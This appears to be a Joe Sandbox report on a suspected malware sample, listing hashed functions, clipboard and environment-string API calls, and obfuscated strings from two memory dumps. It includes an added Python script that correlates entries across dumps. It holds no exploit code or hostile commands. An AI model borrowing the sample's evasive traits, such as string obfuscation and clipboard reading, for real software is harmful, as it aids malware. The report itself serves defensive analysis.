                                                    • Instruction Fuzzy Hash: 60113D71605B808BD329CF24C8A4BABBBF0FB02344F44491ED5D797A92D3BAF4498B45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
                                                    • Instruction ID: 4bee8a8c3048ba02a9597fe8f410917b32f814afa0efa4b7809803484cd1e96c
                                                    • Opcode Fuzzy Hash: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
                                                    • Instruction Fuzzy Hash: 761139B0508341AFD304CF14C8A4B1BBBE1BB8A318F048A2DF8D49B240C778D9068B86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
                                                    • Instruction ID: e6a21cfd48ccecce0c7a3d54777b2644280168018e78a496dfdad913fb49de2b
                                                    • Opcode Fuzzy Hash: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
                                                    • Instruction Fuzzy Hash: 661109715183419FD304CF14D495B1BBBE1BB8A318F458A2DF4D5AB241C778D9058B4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction ID: 5c81f4361908b07e1b355e44fdd23e09d60441cca570a0dfe1a3837b281fad67
                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction Fuzzy Hash: EC01A7B6700A148FDF21CF24C854BEA37F5EB89219F4544E9E50797242E774B9418B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                    • Instruction ID: edc022f0f835ff83a5cdfbe39b494090ddee19a70f6f616abed2a4107b6d6b2d
                                                    • Opcode Fuzzy Hash: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                    • Instruction Fuzzy Hash: 3ED012E5D0414087EA0CEA20EC9197A7262DB96308F28A138C4E753265EB21B919C545
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                    • Instruction ID: de3ce6f7ae6e3d5ea65c66cf0705fbc442ae878a1daf767fd50fb3e27dbea20b
                                                    • Opcode Fuzzy Hash: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                    • Instruction Fuzzy Hash: 1AD0C264D04500C7D608DA20FC4196A7222DBA130CF28653DD496232A6E930AD198549
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                    • Instruction ID: 6ca33cff2030e7d1ed841a683f7be1684981f47ca6dc12ab15e49ada3de7653e
                                                    • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                    • Instruction Fuzzy Hash: B8D0A7E15487A11E97588D3854E087BFBF4E947612B1824DEE4D5E3109D324E8018798
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                    • Instruction ID: ef5f6f15fdba078049cde65a2549cec0935e602115ccd1401630279531ef5664
                                                    • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                    • Instruction Fuzzy Hash: 77D0A771A487A10E97588D7808A0477FBE8E947712F1814AFE4D5F7249D638DC05869C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00cfa2a1bd9d8d6983a05bc107cc555247b033b7bebdd7e79f52daa53810972e
                                                    • Instruction ID: fc63ff7144db230d088183717acfc14d3aba176eca07f96b411a1d117e3a196b
                                                    • Opcode Fuzzy Hash: 00cfa2a1bd9d8d6983a05bc107cc555247b033b7bebdd7e79f52daa53810972e
                                                    • Instruction Fuzzy Hash: 62D0127795180A4A9621CF24D981471A7229BC3354734A3444A21633F6DD30D837598C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                    • Instruction ID: e75f760344972e11c8b48404786a159fb0baaeb0a6ce8aec3f61412875dfe28a
                                                    • Opcode Fuzzy Hash: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                    • Instruction Fuzzy Hash: 88C09B1085C9C04BD75DCF245C7E5B5FF354D43144E18B0AEC1931B897E150944D434E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                    • Instruction ID: f45e16bd6bf12c943f4fa679602ffb422c19f1c1188769583267d47369720cef
                                                    • Opcode Fuzzy Hash: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                    • Instruction Fuzzy Hash: 5CC04828B6A0509A9200DF16AA40432A2BAABC7205B15E0208101632AADA39A806CA8D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                    • Instruction ID: 7bd2b15116bf5bad7ca5f628bad3fa516ab478f3cf40b7ce66427aac778f7d1a
                                                    • Opcode Fuzzy Hash: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                    • Instruction Fuzzy Hash: 46C0923CF5D0509FD604DF1AFA51435B2BAABCB305B15F0349006A32ADCE39D8078A0D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                    • Instruction ID: e75f760344972e11c8b48404786a159fb0baaeb0a6ce8aec3f61412875dfe28a
                                                    • Opcode Fuzzy Hash: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                    • Instruction Fuzzy Hash: 88C09B1085C9C04BD75DCF245C7E5B5FF354D43144E18B0AEC1931B897E150944D434E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                    • Instruction ID: 7bd2b15116bf5bad7ca5f628bad3fa516ab478f3cf40b7ce66427aac778f7d1a
                                                    • Opcode Fuzzy Hash: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                    • Instruction Fuzzy Hash: 46C0923CF5D0509FD604DF1AFA51435B2BAABCB305B15F0349006A32ADCE39D8078A0D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                    • Instruction ID: 5c4c2a12a684bc4ff0d5a99ec30874bcdf27f0d0682448e5fdc4a84297f01b14
                                                    • Opcode Fuzzy Hash: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                    • Instruction Fuzzy Hash: 87C0926CE9D0609FD200DF17FA40431B2BAABDB305B25F0218041632ADCA3AD8078B0E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Clipboard$CloseDataInfoOpenWindow
                                                    • String ID: 7$8$9$:$;
                                                    • API String ID: 2278096442-1017836374
                                                    • Opcode ID: 76df721bf2a579621502fc47aaa496d3d10c4b1d72995d62b2f3639b8e2e78c9
                                                    • Instruction ID: a20b5e2a8e53a31f38c4f10cb002b7da607507cf181b38d8d599ad32ed486ae8
                                                    • Opcode Fuzzy Hash: 76df721bf2a579621502fc47aaa496d3d10c4b1d72995d62b2f3639b8e2e78c9
                                                    • Instruction Fuzzy Hash: D4518EB0608784CFD724DF28C9C5716BBE0BB05214F058A5DD9DA8BA41F334B906EBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 041ED9E4
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 041EDA0F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: -^$AV$SE$X&
                                                    • API String ID: 237503144-3017178743
                                                    • Opcode ID: 88672712ba695551f4c2e9363b205b4fc2188bcfb2a8aaf974e2784d1cbba389
                                                    • Instruction ID: d2110434b4d3b71bcc35d9cb2667af9c087282c3d319fc7bd6ab5fc9b0a5537c
                                                    • Opcode Fuzzy Hash: 88672712ba695551f4c2e9363b205b4fc2188bcfb2a8aaf974e2784d1cbba389
                                                    • Instruction Fuzzy Hash: 9C717A742083428FE724CF15D890BABB7E1EFC6314F154A2CE9E95B280E774A545CB97
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 041E4C04
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 041E4C35
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: 2M#O$<Y.[$r]Nm$qrs
                                                    • API String ID: 237503144-2765572984
                                                    • Opcode ID: b4209384774e64906f4bd2642607d0db43ac134c72471375abf5c82cf001131c
                                                    • Instruction ID: 2dbd07c413cf32736e804dcebdbd31420aea34bacef00d077f7706666b10b2b7
                                                    • Opcode Fuzzy Hash: b4209384774e64906f4bd2642607d0db43ac134c72471375abf5c82cf001131c
                                                    • Instruction Fuzzy Hash: 8251A1746183419BD324CF15C891BABB7F5FFC6324F054A1CF9958B281E3B4A805CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 041EE2F4
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 041EE323
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: ru$M3
                                                    • API String ID: 237503144-652937946
                                                    • Opcode ID: 103d3fe5a7db0c83f1ebe805be3a67d3ced831ce374e262ff3f3ddc4eeca0531
                                                    • Instruction ID: 3fb33d4d2bea3242fe89a7375dc26af15ee2b92a1d2097102d80c66b7f281dbf
                                                    • Opcode Fuzzy Hash: 103d3fe5a7db0c83f1ebe805be3a67d3ced831ce374e262ff3f3ddc4eeca0531
                                                    • Instruction Fuzzy Hash: F95142B5108381AFE714CF01C990B6BBBE5EBC5354F10892DF8A95B381C775EA46CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 041E3848
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 041E3879
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: E&eb
                                                    • API String ID: 237503144-175690455
                                                    • Opcode ID: 35764304b26e08c2116ddeae35a6a5734124e71df00623c25cae61cad56f9e43
                                                    • Instruction ID: 28b9682810dd5e83194a161e39002d1c5d4f83591f51b31a3ffebd0ee602ead7
                                                    • Opcode Fuzzy Hash: 35764304b26e08c2116ddeae35a6a5734124e71df00623c25cae61cad56f9e43
                                                    • Instruction Fuzzy Hash: 28618EB5600B409FD328CF28C891B77B3E6AF85314F148A2DE5AAC7690E774B945CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004135E1
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 00413612
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: E&eb
                                                    • API String ID: 237503144-175690455
                                                    • Opcode ID: 121384bb134e3370c515887561e4bff28e3ea622f5c04769a53e04112e5161fb
                                                    • Instruction ID: 3627e64b03e8dace2a403a76fce9a7d6649682aa9ea1d52bf6d0af3834cb9b1a
                                                    • Opcode Fuzzy Hash: 121384bb134e3370c515887561e4bff28e3ea622f5c04769a53e04112e5161fb
                                                    • Instruction Fuzzy Hash: F761A171600B009FD338CF24C882BA7B3E6EB45315F148A2DE4AAC77D0E778B9858B55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 0420201A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: m%s$!EJK
                                                    • API String ID: 237503144-2691780584
                                                    • Opcode ID: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                    • Instruction ID: 19cd1fcf01f9d5b191986fe644048711ce0aeb1046cfe0511377efec66d5b57f
                                                    • Opcode Fuzzy Hash: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                    • Instruction Fuzzy Hash: 9A21A9B10083808FD304CF14D891B2BBBF4FB86348F100A2CF9A1AB280D771D9058B86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 00431DB3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: m%s$!EJK
                                                    • API String ID: 237503144-2691780584
                                                    • Opcode ID: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                    • Instruction ID: 1bf3f748f95ab631ae595585e1a386fe61c7083a19ceef915992d3bd27d4ea4a
                                                    • Opcode Fuzzy Hash: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
                                                    • Instruction Fuzzy Hash: 4D219AB14083908FD304CF15D891B5BBBF4FB8A348F110A2DF9A1AB280D775D905CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

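The two entries above carry the same Opcode ID (f2095f0e…) but different Instruction IDs, one in the unpacked region at 041D0000 (based on PE: false) and one in the original image at 00400000 (based on PE: true); the same kind of pairing, keyed on API String ID rather than Opcode ID, links the E&eb entries at 041E3848 and 004135E1. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses entries in the format shown on this page and lists the IDs that occur in more than one memory dump source, together with each call site's RVA inside its dump. The excerpt it runs on is constructed from three entries of this report with the non-essential lines trimmed; the assumption that every entry begins at an `APIs` line, and all function names, are the example's own.

```python
"""Correlate Joe Sandbox function entries across memory dump sources (added example)."""
import re
from collections import defaultdict

# Constructed excerpt: three entries copied from the report above (field values
# verbatim), trimmed to the lines the parser uses. Assumed: an entry starts at "APIs".
SAMPLE_REPORT = """\
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 0420201A
Memory Dump Source
• Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
Similarity
• API ID: EnvironmentExpandStrings
• String ID: m%s$!EJK
• API String ID: 237503144-2691780584
• Opcode ID: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
• Instruction ID: 19cd1fcf01f9d5b191986fe644048711ce0aeb1046cfe0511377efec66d5b57f
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 00431DB3
Memory Dump Source
• Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: EnvironmentExpandStrings
• String ID: m%s$!EJK
• API String ID: 237503144-2691780584
• Opcode ID: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
• Instruction ID: 1bf3f748f95ab631ae595585e1a386fe61c7083a19ceef915992d3bd27d4ea4a
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 041E4C04
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 041E4C35
Memory Dump Source
• Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
Similarity
• API ID: EnvironmentExpandStrings
• String ID: -^$AV$SE$X&
• API String ID: 237503144-3017178743
• Opcode ID: 88672712ba695551f4c2e9363b205b4fc2188bcfb2a8aaf974e2784d1cbba389
• Instruction ID: d2110434b4d3b71bcc35d9cb2667af9c087282c3d319fc7bd6ab5fc9b0a5537c
"""

# "• Api.Module(args), ref: ADDR" call lines; "xrefs:" string lines do not match.
API_RE = re.compile(r"^• (?P<api>[\w.]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$")
SOURCE_RE = re.compile(r"Offset: (?P<offset>[0-9A-Fa-f]{8}), based on PE: (?P<pe>true|false)")
FIELD_RE = re.compile(r"^• (?P<key>API String ID|Opcode ID|Instruction ID): (?P<val>\S+)$")


def parse_entries(text):
    """Return one dict per function entry: calls, dump offset, PE flag and the ID fields."""
    entries, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if line == "APIs":                      # assumed delimiter between entries
            cur = {"calls": [], "offset": None, "based_on_pe": None}
            entries.append(cur)
        elif cur is None:
            continue
        elif m := API_RE.match(line):
            cur["calls"].append((m["api"], m["args"].split(","), int(m["ref"], 16)))
        elif m := SOURCE_RE.search(line):
            cur["offset"] = int(m["offset"], 16)
            cur["based_on_pe"] = m["pe"] == "true"
        elif m := FIELD_RE.match(line):
            cur[m["key"]] = m["val"]
    return entries


def group_by(entries, key):
    """Map each value of `key` to (dump offset, [call-site RVAs within that dump]) pairs."""
    groups = defaultdict(list)
    for e in entries:
        if key in e and e["offset"] is not None:
            groups[e[key]].append((e["offset"], [ref - e["offset"] for _, _, ref in e["calls"]]))
    return groups


def shared_across_dumps(entries, key="Opcode ID"):
    """{value: sorted dump offsets} for values of `key` that appear in more than one dump."""
    out = {}
    for val, hits in group_by(entries, key).items():
        offsets = sorted({off for off, _ in hits})
        if len(offsets) > 1:
            out[val] = offsets
    return out


def repeated_call_sites(entries, api="RtlExpandEnvironmentStrings.NTDLL"):
    """Entries that call `api` at least twice (the report lists several such pairs)."""
    return [e for e in entries if sum(1 for a, _, _ in e["calls"] if a == api) >= 2]


if __name__ == "__main__":
    ents = parse_entries(SAMPLE_REPORT)
    for key in ("Opcode ID", "API String ID"):
        for val, offsets in shared_across_dumps(ents, key).items():
            print(key, val[:16], "in dumps", [f"{o:08X}" for o in offsets])
    for e in repeated_call_sites(ents):
        print("repeated call at", [f"{r:08X}" for _, _, r in e["calls"]])
```

Matching on Opcode ID finds code that is identical at the opcode level even though the Instruction IDs differ, which is what the report shows for the two copies of the m%s function; the RVAs it prints (0x3201A in the 041D0000 dump versus 0x31DB3 in the 00400000 image) show that the copy in the unpacked region is not at the same relative position as the one in the original image.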
                                                    APIs
                                                    Strings
                                                    • in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 041D8F24
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
                                                    • API String ID: 621844428-4175449110
                                                    • Opcode ID: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                    • Instruction ID: 535416a31db32d85ac9067df0811993fac80e365130cf1e79eaa23e648d351c6
                                                    • Opcode Fuzzy Hash: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
                                                    • Instruction Fuzzy Hash: 20F0FCF0E182009BEB0C7B78FEC526D3FA69F01264F010AA6C8FA82144F774B10596B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%